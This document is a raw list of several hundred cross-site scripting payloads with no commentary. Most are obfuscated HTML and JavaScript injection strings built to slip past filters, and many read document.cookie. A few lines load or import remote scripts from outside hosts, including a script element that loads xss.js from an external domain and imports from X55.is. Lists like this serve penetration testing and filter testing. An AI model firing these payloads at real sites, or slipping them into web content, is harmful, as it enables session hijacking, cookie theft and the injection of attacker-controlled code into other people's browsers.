#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
#javascript:alert(2);
"><svg onload=alert(1)>
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
<img+border=3+alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/*+*/oNcliCk=alert()+)//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=confirm('Hassan')//&gt;\x3e>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<!-- --!><script>alert(1)</script>
document[cookie]
<A HRef=//Xss_Sxss.store AutoFocus %26%2362 OnFocus%0C=import(href)> 
alert(cookie)
alert()
%61lert();
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<%73vg onlo%61d=%61lert('xss0r')>
<iframe src="javascript:alert(document.domain)"></iframe>
xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
<isindex+type=image+src=1+onerror=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle​=&#x0000000000061;lert&#x000000028;origin&#x000029;> 
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
<img src=x onerror="alert(origin)">
"><img/src=%20only=1%20OnErRor=x=alert`XSS`><!--
"><form+onformdata=window.confirm(document.cookie)><!--
logout.php?callback=<script>alert()</script>%0aTEST
sm"*alert(1)*"
javascript​:parent[/al/.source+/ert/.source](document.domain)
callback=<script>alert()</script>%0aTESTž
javascript:alert('XSS')
1\/confirm?.(1)/\
1%27/confirm?.(1)/%27
"*alert(1)*"
1'/confirm?.(1)/'"
Xss_so"*alert(1)*"
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 
"onclick​=prompt(8)><svg/onload​=prompt(8)>" 
PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4=
alert?.(1) 
<script>eval('al'+'ert(1)');</script>
“;alert(1)/
aaaa “;alert(1)/
<img src=x onerror=alert&#40document.domain&#41>
'alert(1)'.replace(/.+/,eval)
<img src/onerror=alert(1)>
#'%22/onmouseover=alert(document.domain)//
onmouseover=alert(document.domain)//
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
1"*%2Fconf%0Cirm%0B(1)<%0C%2FScript%2F--%0C><%0CScript>%2F*
1"*/confirm(1)</Script/--><Script>/*
test<img src=a onerror​=window['alert'](window['document']['cookie']);>test
<img onfocus=alert(1) autofocus tabindex=1>	
<p onfocus=alert(1) autofocus tabindex=1>	
<form onfocus=alert(1) autofocus tabindex=1>	
<svg onfocus=alert(1) autofocus tabindex=1>	
<wbr onfocus=alert(1) autofocus tabindex=1>	
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022<​script>alert("Xss_so")<​/script>\u0022\u003e
<hgroup onfocus=alert(1) autofocus tabindex=1>	
<input onmouseover=alert(1)>
<ul onfocus=alert(1) autofocus tabindex=1>	
<video onfocus=alert(1) autofocus tabindex=1>	
<svg onload​=alert&#0000000040document.cookie)>
<details/open/ontoggle​=confirm('XSS')>
;'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)(1)-->
<svg onload​='new Function*["Y000!"].find(al\u0065rt)*'>
"><body/oNpagEshoW​=(prompt)()>
"><body/oNpagEshoW​=(prompt)(document.domain)>
"><script>alert('Xss_Sxss')</script>
%2522%253e%253cscript%253ealert%2528%2527BUG XSS By Wildan!%2527%2529%253c%252fscript%253e
"><input/onfocus​=(confirm)(document.domain)>
"><body/oNpagEshoW​=(confirm)(document.domain)>
"><body/onfocus​=(confirm)(document.domain)>
"><Body/oNpagEshoW​=(prompt)(1)>
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
img src='#' onerror='alert(1)'>">
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%22%3E%3Csvg%2Fonload=confirm(document.cookie)%3E 
<mark onfocus=alert(1) autofocus tabindex=1>	
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">	
<plaintext onfocus=alert(1) autofocus tabindex=1>	
<video controls src=1 onfocus=alert(1) autofocus>	
xss0r\"-alert(1)}//
<video src="#" controls onwebkitplaybacktargetavailabilitychanged="alert(1)"></video> 
<svg><image href=1 onerror=alert(1)>	
&𝐥𝐭;𝐢𝐦𝐠<> 𝐬𝐑𝐂=𝐱 𝐎𝐧𝐄<>𝐫𝐫𝐎𝐫=𝐚𝐥<>𝐞𝐫𝐭(1)> 
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<audio src/onerror=alert(1)>	
<ol onfocus=alert(1) autofocus tabindex=1>	
<image2 onfocus=alert(1) autofocus tabindex=1>	
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--
a'-alert(1)//
'/alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
';alert(document.cookie)//
<svg/onload​=alert/*1337*/(1)>
<svg/onload​=alert//&NewLine;(2)>
<svg/onload​=alert&sol;**&sol;(3)>
&lt;script>alert(document.cookie)&lt;/script>
<svg/onload​=alert/&#42;&#42;/(4)>
<svg/onload​=alert&#x2F;**&#47;(5)>
'-confirm?.(1);function+myObj(){}'
"' OnError=(confirm)(1) <!--><Img Src='
#Data:,<Img/Src/OnError=(confirm)(1)>
}/confirm?.(1)//%5C
"'<!--><Img/Src/OnError=(confirm)(1)>"shadowpentesting@gmail.com
%27)/confirm?.(1);function+myObj(){};function+atob(){confirm?.(1)}//
<Script /Src=https://X55.is?1=18369></Script>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=18369/.source))//>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1)}//><Base/Href=//X55.is\76-->
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=18369/.source))}//\76-->
confirm?.(1) 
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
<svg%20onload=alert%28document.domain%29>
<script ~~~>alert(0%0)</script ~~~>
"ontouchend%3Dprompt%281%29+class%3Dd3rk+
`'%3balert(String.fromCharCode(88,83,83))%2f%2f'%3balert(String.fromCharCode(88,83,83))%2f%2f"%3balert(String.fromCharCode(88,83,83))%2f%2f"%3balert(String.fromCharCode(88,83,83))%2f%2f--
"><svg onScroll="javascript:alert(1)//
<x \'=\"foo\"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>
\">%0D%0A%0D%0A<x \'=\"foo\"><x foo=\'><img src=x onerror=javascript:alert(`cloudfrontbypass`)//\'>
`\"\'><img src=\'#\\x27 onerror=javascript:alert(1)>
<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>alert(1)</script>\">
<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(91)</script>\">
"<!--><Svg OnLoad=confirm?.(/d3rk😈/)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk😈/)<!--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
url=%26%2302java%26%23115cript:alert(document.domain)
%26%2302java%26%23115cript:alert(document.domain)
">>>>>><marquee>RXSS</marquee></head><abc%3E</script><script>alert(document.cookie)</script><meta
“><iMg SrC=x onError​=prompt()>
\" onload=prompt(1)>
<a/href=\"j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)\
<sVg OnPointerEnter=\"location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div\"> \n
<svg onload\\r\\n=$.globalEval(\"al\"+\"ert()\");>\n
<details/open/ontoggle=\"self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];\">
"><​script>prompt()<​/script>
<Svg On Only=1 Onload=alert("hex")>
"><script>alert(document.cookie)</script>
<<​script>script>prompt()<​/script>
<svg/onload​=prompt()>
<Svg On Only=1 Onload=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<!</textarea <body onload='alert(1)'>
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
</script><script>alert(9)</script>
</script ><script>alert(9)</script><script>
themecolor=%22-alert('XSS')-%22
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
#'%26%26'javascript:alert%25281%2529//
</a onmousemove="alert(1)">
<svg onload=alert (1337)&nvgt;
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al+/e/[`ex + `ec`]`e`+`rt`](2)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
m3ez<Svg Only=1 OnLoad=prompt("Path\x20Injection\x20Reflected\x20XSS:","Supakiad\x205.\x20(m3ez)")>
m3ez%3cSvg%20Only%3d1%20OnLoad%3dprompt("Path\x20Injection\x20Reflected\x20XSS:","Supakiad\x205.\x20(m3ez)")%3e
m3ez%253cSvg%2520Only%253d1%2520OnLoad%253dprompt("Path%5cx20Injection%5cx20Reflected%5cx20XSS:", "Supakiad%5cx205.%5cx20(m3ez)")%253e
6'%22()%26%25%22%3E%3Csvg/onload=prompt(document.domain)%3E/
"><a nope="%26quot;x%26quot;"onmouseover​="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
\’/alert(1)//
‘; alert(1);
‘|alert(1)|’
‘}};alert(1);{{‘
‘}alert(1);{‘
“-alert(1)-”
“}]}’;alert(1);{{‘
alert\\`1\\`
‘-alert(1)-’
('+alert(1)+');;;;();
('+alert(1)////)+')();
'+alert(1)'+;;;;()
////('+alert(1)+')();;;;;
'////;+alert(1)+;;;;()
(';+alert(1)+)::();
("+alert(1)+')()
////('+alert(1)+');;;;()
('+alert(1)+')+;;;;;;
'+alert(1)+')'::::()
(';++++alert(1)////())
('++alert(1)\\\\()
(';alert(1)'+;;;;()
//(';alert(1)+);;;;;()
(';;;;alert(1)()+);;;;;
';alert(1)//()+;;;;
(;alert(1);;;);()
';;;;alert(1)+'()
('alert(1);;;;;)+()
(';;;;alert(1)////)()
.alert(1);;;;;
//.alert(1);;;;;
.;alert(1)////;
::::.alert(1)();;;;;
.alert////(1)////;
.;;;;alert(1);;;;;
\\.;alert(1);;;;;
.alert(1);;;;
.;alert(1)();;;;;
.alert(1)::::;;;;
;;;;;.alert(1);;;;
;;;;.alert(1)()
////;.alert(1);;;;;
\\.;alert(1)////
.alert(1)';;;;;
;;;;alert(1)';;;;;
.;;;;alert(1);;;;;()
.alert(1);;;;;;
.alert;;;;(1)();
.alert(1);:::;;;;
\'-alert(1);;;;////
\'-alert(1):://
\'-;;;;alert(1)////
\\'-alert(1)////;;;;
\'-alert;;;;(1)////
\'-alert(1)//;;;;;;
\'-;;;;alert(1)\\////
\'-alert(1)//\\;;;;;
;;;;\'-alert(1)////
\'-alert(1);;;;;//
\'-alert////(1)////
\'-alert////;;;;(1)//
\'-alert(1);;;;;
\'-alert(1)::;:://
\'-alert(1)//;;;;
\'alert(1)//;;;;;
\\\\\'-alert(1)//;;
\'--alert(1)////;;;;
\'alert;;;;(1);;;;
#\'-alert(1)//;;;;
#\'-alert(1);;;;//
#\';;;;alert(1)////
\\\\#\'-alert(1)//;;;;
#\'-;;;;alert(1)//
#\'-alert(1)//;;;;;;
#\'-alert;;;;(1)////
#\'-alert(1)//;;;;;;;
#\'alert(1)////;;;;
#\'alert(1)//;;;;;;;
#\'-alert(1)////;;;;
#\'alert////(1)//;;;;
#\'-;;;;alert(1)//;;;;
#\'alert(1)//;;;
#\'-alert(1);;;;;
#\'-alert(1)//::::
#\'alert(1);;;;;
#\'-alert(1)////;;;;;;
'};;;;alert(1);;;;;{'
'};;;;alert(1);;;;;;;;{'
'};;;;alert(1){{;;;;
'};;;;alert(1);;;{{}
'};;;alert;;;;(1);{{}
'};;;;alert////(1);;;{
'};;;;alert////(1);;;;;{
'};;alert(1);;;;;;;{
'};;alert////(1){;;;;}
';;;;;alert(1){};;;;
'};;;alert(1);;;;{
';;;;alert(1);;;;;{;;;;}
'};;;alert;;;;(1);;;{
'};;;;alert(1);;;;;;;
';;;alert;;;;(1);{{;;
';;;alert;;;;(1){{}}
'};;;;alert(1);;;{}
'}alert(1);;;;{;;;;}
'};;;;alert(1);;;{{{
'};;;;;alert(1);{{}
#*/alert(1);;;;
#*/alert(1)////;
#*;;;;alert(1);;;;;
#*::::alert(1);;;;;
#*;;;;alert(1);;;;;;;
#*/;;;;alert(1);;;;;
#*/alert(1)();;;;;;;
#*/alert(1);;;;;////
#*/;;;;alert(1);;;;
#*/alert(1);;;;;;;
#*/alert(1);;;;::::
#*;;alert(1);;;;;;;
#*//alert(1);;;;;;;
#*/;;;;alert(1)();;;;;
#*alert(1)();;;;;;;
#*/alert(1);;;;::::;
#*/alert(1)::::;;;;
\"-alert(1)};;;;//
\"-;;;;alert(1)}//;;;;
\"-alert(1)}////;;;;;;
\"-;;;;alert(1)}////;;;;
\"-alert(1)}//;;;;;;;
\"-;;;;alert(1)}//;;
\"-alert(1)};;;;//;;
\"-alert(1)};;;;;;;////
\"-alert;;;;(1)}////;;;;
\"-alert(1)};:::////
\"-alert(1)};;;;:::://
\"-;;;;alert(1)}//;;;;;;
\"-alert(1)};;;;;;;
\"-alert;;;;(1)};;;;;;
\";;;;alert(1)}////;;
\"-alert;;;;(1)};;;;;
\"-alert(1)}////::::
\"-alert(1)};;;;;:::://
\"-alert;;;;(1)}//;;;;;
\";;;;alert(1)};;;;;;////
alert(document.cookie);;;;;
alert(document.cookie)////;;;;
alert;;;;(document.cookie)::::;;;;
;;;;alert(document.cookie)////
alert(document.cookie);;;;
alert////(document.cookie);;;;;
alert(document.cookie)::::;;
alert(document.cookie);;;;;;;;;
alert;;;;(document.cookie)////
;;;;alert////(document.cookie);;;;
alert(document.cookie);:::;;;;
alert;;;;document.cookie)::::;;
;;;;alert(document.cookie);;;;;;;
alert(document.cookie)////::::
alert;;;;(document.cookie);;;;
alert////(document.cookie);;;;;;;
alert(document.cookie)';;;;;;;
alert(document.cookie);;;;;;;
alert;;;;document.cookie)////;
alert(document.cookie);;;;;;;::::
‘);alert(‘done’);var b=(‘
‘);;;;;alert(‘done’);;;;;var b=(‘;;;;
‘);alert(‘done’);;;;;var b=(‘////;;;;
‘);;;;;alert(‘done’);var b;;;;=(‘::::;;;;
‘);alert;;;;(‘done’);;;;;var b=(‘;;;;;;
‘);;;;;alert(‘done’);;;;;var b;;;;=(‘
‘);;;;;alert;;;;(‘done’);var b=(‘;;;;
‘);alert;;;;(‘done’);;;;;var;;;;b=(‘;;;;
‘);alert(‘done’);;;;;;;;;var b;;;;=(‘;;;;
‘);;;;;alert(‘done’);;;;;var;;;;b=(‘;;;;;;
‘);alert;;;;(‘done’);;;;;var;;;;b=(‘////;;;;
‘);;;;;alert;;;;(‘done’);;;;;var;;;;b=(‘;;;;;;;
‘);alert;;;;(‘done’);var;;;;b;;;;=(‘;;;;
‘);;;;;alert(‘done’);;;;;var;;;;b;;;;=(‘;;;;;;
‘);alert(‘done’);;;;;;;;;var;;;;b;;;;=(‘;;;;
‘);;;;;alert;;;;(‘done’);;;;;var;;;;b;;;;=(‘;;;;
‘);alert;;;;(‘done’);;;;;;;var;;;;b;;;;=(‘;;;;;;
‘);alert(‘done’);;;;;;;var;;;;b;;;;=(‘////;;;;
‘);;;;;alert;;;;(‘done’);;;;;;;var;;;;b;;;;=(‘;;;;;;
‘);alert;;;;(‘done’);;;;;var;;;;b;;;;=(‘;;;;
');;;;;alert('Humal');;;;
');alert('Humal')////;;;;
';;;;;alert('Humal')////
');alert;;;;('Humal');;;;
');;;;;alert('Humal');;;;;
');alert('Humal');;;;;;;;
');alert('Humal');;;;;////
');;;;;alert('Humal')::::;;;;
');;;;;alert;;;;('Humal');;;;;
');;;;;alert('Humal')::::
');;;;;alert('Humal');;;;;;;
';;;;;alert('Humal');;;;;
');;;;;alert('Humal');;;;;;;;
');alert('Humal')////;
');alert;;;;('Humal');;;;;;;
');;;;;alert('Humal');;;;::::
\\";;;;alert('Humal');////
\\;;;;alert('Humal');;;;;//
\\;;;;alert('Humal');;;;;;;
\\\\;;;;alert('Humal');////
\\";;;;alert('Humal')////;;;;
\\";;;;alert('Humal');;;;;;;
\\"alert('Humal');;;;;//
\\\\;;;;alert('Humal');;;;;
\\\\alert('Humal');;;;;;;
\\";;;;alert('Humal')::::;;;;
\\;;;;alert('Humal');;;;;
\\";;;;alert('Humal');;;;////
\\;;;;alert('Humal');;;;;;
\\";;;;alert('Humal');;;;;;
\\\\alert('Humal')////;;;;
\\";;;;alert('Humal')////;;;;;;
\\";;;;alert('Humal');;;;::::
*/alert('HUMAL\n-HUMAL');;;;;////
*/alert('HUMAL\n-HUMAL');;;;;//;;;;
*/alert;;;;('HUMAL\n-HUMAL');;;;////
*/alert('HUMAL\n-HUMAL');;;;;//;;
*/;;;;alert('HUMAL\n-HUMAL');;;;;//
*/alert('HUMAL\n-HUMAL')////;
*/alert('HUMAL\n-HUMAL');;;;;;////
*/alert;;;;('HUMAL\n-HUMAL');;;;;
*/alert('HUMAL\n-HUMAL');;;;::::
*/;;;;alert('HUMAL\n-HUMAL');;;;;;
*/alert('HUMAL\n-HUMAL');;;;////
*/alert('HUMAL\n-HUMAL')::::;;;;
*/alert('HUMAL\n-HUMAL');;;;;;;;
*/alert('HUMAL\n-HUMAL');;;;;;;
*/alert('HUMAL\n-HUMAL');;;;;;
*/alert;;;;('HUMAL\n-HUMAL')////;;
*/alert('HUMAL\n-HUMAL')////::::
');;;;;alert('Humal');;;;;var x=';;;;
');alert('Humal');;;;;var x='////;;;;
');alert('Humal');;;;;var;;;;x=';;;;
');;;;;alert('Humal');;;;;var;;;;x=';;;;;;
');alert('Humal')::::var;;;;x=';;;;
');;;;;alert('Humal');;;;;var;;;;x=';;;;
');alert('Humal');;;;;;;var;;;;x=';;;;
');alert('Humal');;;;;;;;var;;;;x=';;;;;;
');alert;;;;('Humal');;;;;;;var;;;;x=';;;;;;
');;;;;alert('Humal');;;;;;;;var;;;;x=';;;;
');alert('Humal');;;;;;;;var;;;;x=';;;;
');alert;;;;('Humal');;;;;var;;;;x=';;;;
');alert;;;;('Humal');;;;;;;;var;;;;x=';;;;;;
');alert('Humal');;;;;var;;;;x='////;;;;
');alert('Humal')::::var;;;;x=';;;;;;
');alert('Humal');;;;;;;;var;;;;x=';;;;;;;
');;;;;alert('Humal');;;;;;;;var;;;;x=';;;;;;;
\\\\');alert(\'Humal\');;;;;var x=\'
\\');;;;;alert(\'Humal\');;;;;var;;;;x=\'
\\');alert(\'Humal\');;;;;var;;;;x=\'////;;;;
\\');alert\'Humal\';;;;;var;;;;x=\';;;;;;
\\\\');;;;;alert(\'Humal\');;;;;var;;;;x=\'
\\');alert\'Humal\'////;;;;var;;;;x=\';;;;
\\');alert\'Humal\';;;;;;var;;;;x=\'
\\');alert\'Humal\';;;;;;var;;;;x=\'////
\\\\');alert\'Humal\';;;;;;;;var;;;;x=\';;;;
\\\\');alert\'Humal\'////;;;;var;;;;x=\';;;;;
\\');alert\'Humal\';;;;;;;;var;;;;x=\'
\\');alert\'Humal\'::::var;;;;x=\';;;;;;
\\\\');alert\'Humal\';;;;;;;var;;;;x=\';;;;
\\');alert\'Humal\'////;var;;;;x=\';;;;
\\');alert\'Humal\';;;;;;;;var;;;;x=\';;;;;
\\\\');alert\'Humal\'////;;;;var;;;;x=\';;;;;;
\\');alert\'Humal\';;;;;;;var;;;;x=\'
\\\\');alert\'Humal\';;;;;;;;var;;;;x=\';;;;;;
/confirm(1)?.(1)//;;;;
/confirm(1)?;;;;.(1)//;;;;
/confirm(1)?.;;;;(1)////;;
/confirm;;;;(1)?.(1)//;;;;
/confirm(1)?.;;;;(1)//;;;;
/confirm(1)?.;;;;(1)////
/confirm(1)?;;;;.(1)////;;;;
/confirm;;;;(1)?;;;;.(1)////;;;;
/confirm(1)?::::.(1)////;;;;
/confirm(1)?.;;;;.(1)////
/confirm(1)?;;;;.(1)//;;;;;;
/confirm;;;;(1)?.;;;;(1)////
/confirm(1)?;;;;.(1)////;;
/confirm(1)?::::.(1)////;;
/confirm(1)?.(1)//;;;;;;
/confirm(1)?::::.(1)//;;;;
/confirm(1)?.;;;;(1)//;;;;;;;
/confirm?.(1)//;;;;
/confirm?.;;;;(1)////
/confirm?.;;;;(1)//;;;;
/confirm?.;;;;(1)//;;
/confirm?;;;;(1)////;;;;
/confirm?.(1)////;;;;
/confirm?::::.(1)////;;;;
/confirm?.(1)//;;;;;;
/confirm?.;;;;(1)//;;;;;;
/confirm?;;;;(1)//;;;;;;
/confirm?.;;;;(1)////;;;;
/confirm?.(1)//::::;;;;
/confirm?.(1)//;;;;;;;
/confirm?.(1)////;;;;;;
/confirm?.;;;;(1)////;;;;;;;
‘;;;;alert(123);;;;;t=’
‘alert(123);;;;;t=’
‘;;;;alert(123);;;;;t=’;;;;
‘alert;;;;(123);;;;;t=’;;;;
‘alert(123)::::t=’;;;;
‘;;;;alert(123);;;;;t=’;;;;;;
‘alert;;;;(123);;;;;t=’;;;;;;
‘;;;;alert(123)::::t=’;;;;;;
‘alert(123);;;;;t=’;;;;;;
‘alert(123)::::t=’;;;;;;;
‘alert(123);;;;;;;t=’
‘alert;;;;(123);;;;;t=’;;;;;;;
‘;;;;alert(123);;;;;t=’;;;;;;;
‘alert(123);;;;;t=’;;;;;;;
“;;;;alert(123);;;;;t=”
“alert(123);;;;;t=”;;;;
“;;;;alert(123);;;;;t=”;;;;
“alert;;;;(123);;;;;t=”;;;;
“alert(123)::::t=”;;;;;;
“;;;;alert(123);;;;;t=”;;;;;;
“alert(123);;;;;t=”;;;;;;
“;;;;alert(123)::::t=”;;;;;;
“alert(123)::::t=”;;;;;;;
“alert;;;;(123);;;;;t=”;;;;;;
“alert(123);;;;;t=”;;;;;;;
“alert;;;;(123);;;;;t=”;;;;;;;
“alert(123);;;;;;;t=”;;;;
‘>alert(154)</script>;;;;<script/154=’;;;;
‘>alert(154)</script><script////154=’;;;;
‘;;;;>alert(154)</script><script/154=’;;;;;;
‘>alert(154)::::</script><script/154=’;;;;;;
‘>alert(154)</script><script;;;;154=’;;;;;;
‘;;;;>alert(154)</script><script/154=’;;;;;;;
‘>alert(154)</script><script/154=’;;;;;;;
‘>alert(154)</script>;;;;<script/154=’;;;;;;
‘>alert;;;;(154)</script><script/154=’;;;;;;
‘>alert(154)::::</script><script/154=’;;;;;;;
‘>alert(154)</script>;;;;<script/154=’;;;;;;;
‘>alert(154)</script><script////154=’;;;;;;
‘;;;;>alert(154)</script><script/154=’;;;;
‘>alert(154)</script><script////154=’;;;;;;;
\\\\'-alert(1)//;;;;
\'-;;;;alert(1)//;;;;
\'-alert;;;;(1)//;;;;
\\\\'-alert(1)////
\'-alert(1)//::::;;;;
\'-alert(1)//;;;;;;;
\'-alert(1);;;;;//;;;;
\'-;;;;alert(1)//;;;;;;
\'-alert(1)//;;;;::::
\'-alert(1)////;;;;
\\\\'-alert(1)//;;;;;;
\'-alert;;;;(1)//;;;;;;
\'/alert(1)//;;;;
\'/alert(1);;;;;//
\\\\'/alert(1)//;;;;
\'/;;;;alert(1)//;;;;
\'/alert;;;;(1)//;;;;
\\\\'/alert(1)////
\'/alert(1)//;;;;;;
\'/alert(1)//::::;;;;
\'/alert(1)//;;;;;;;
\'/alert(1);;;;;//;;;;
\'/;;;;alert(1)//;;;;;;
\'/alert(1)//;;;;::::
\'/alert(1)////;;;;
\'/;;;;alert(1)////
\\\\'/alert(1)//;;;;;;
\'/alert;;;;(1)//;;;;;;
\'-alert(1)////
\'////-alert(1)////
\'////-alert(1)////;;;;
\\\'-alert(1)////
\\\\\'-alert(1)////
\\\'////-alert(1)////
\'-alert(1)////;;;;;;
\'\\\\-alert(1)////
\'////-alert(1)\\\\\\\\
\'\\\\\\\\-alert(1)\\\\\\\\
\'-alert(1)////\\\\
\\\'-alert(1);;;;;//;;;;
\\\'////-alert(1)\\\\\\\\;;;;
\'-alert(1)\\\\\\\\;;;;
\\\\\'-alert(1)////;;;;;;
\'////-alert(1);;;;////
\'-alert(1);;;;////\\\\\\\\
\'\\\\-alert(1)////;;;;
\'////alert(1)////
\'/alert(1)////
\'/alert(1)////\\\\
\\\'/alert(1)////
\\\\\'/alert(1)\\\\\\\\
\'/////alert(1)////
\'\\\\alert(1)////\\\\
\\\\\'/alert(1)////\\\\
\'/alert(1)\\\\\\\\;;;;
\'/////alert(1)////\\\\
\\\'/alert(1)\\\\\\\\;;;;;;
\\\'/alert(1)////;;;;;;
\'////alert(1)\\\\\\\\;;;;
\\\\\'/alert(1)////\\\\\\\\;;;;
\'/////alert(1)\\\\\\\\;;;;
\'/alert(1)////\\\\\\\\;;;;
\'/alert(1)\\\\\\\\////
\\\\\'/alert(1)////
\'}alert(1);{////
\\\'}alert(1);{////
\\\'}alert(1);{////\\\\
\'}alert(1);{////;;;;
\'}alert(1);{\\\\\\\\;;;;
\\\\\'}alert(1);{////
\\\\\'}alert(1);{////\\\\
\'}alert(1);{////;;;;;;
\'}alert(1);{\\\\\\\\;;;;;;
\\\\\'////alert(1);{////
\\\\\'alert(1);{\\\\\\\\;;;;
\'}alert(1);{////\\\\
\\\\\'////alert(1);{\\\\\\\\
\'}alert(1);{////\\\\\\\\
\\\\\'alert(1);{////
\'}alert(1);{\\\\\\\\////
\\\\\'////alert(1);{\\\\\\\\;;;;;;
\\\\\'alert(1);{////\\\\\\\\;;;;
"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS%2f.source)>"%2c
<svG/x=">"/oNloaD=confirm()// 
" onfocus​="alert(1)" autofocus="
&#60;body onload=alert('Xss_Sxss')&#62;&#34;&#34;
onpointerover=”alert(‘XSS’)
jAvaScripT:(alert)`1`
javascript:alert('1')
"onpointerover=”alert(‘XSS’)
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
<img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
onclick=”alert(‘XSS’)
onmouseover=”alert(‘XSS’)
onload=”alert(‘XSS’)
onerror=”alert(‘XSS’)
onfocus=”alert(‘XSS’)
onblur=”alert(‘XSS’)
onchange=”alert(‘XSS’)
oninput=”alert(‘XSS’)
onsubmit=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
<img src=x:alert(alt) onerror=eval(src) alt=0>
new Proxy({}, { get: () => alert(1) }).test();
<img src=/ onerror=alert(1)>
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
//";alert(String.fromCharCode(88,83,83))
<svg onload=prompt&#0000000040document.domain)>"
%";eval(unescape(location))//#%0Aprompt(0)
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT
"><script&#x00000003B;alert&#x000000028;1&#x000000029;&#x00000003B;</script>
javascript&#x00000003A;alert&#x000000028;2&#x000000029;&#x00000003B;
"><img src=1 onerror=alert&#x000000028;1&#x000000029;&#x00000003B;">
";eval(unescape(location))//# %0Aalert(0)
¼script¾alert(¢XSS¢)¼/script¾
<img src=1 onerror=alert(1)>
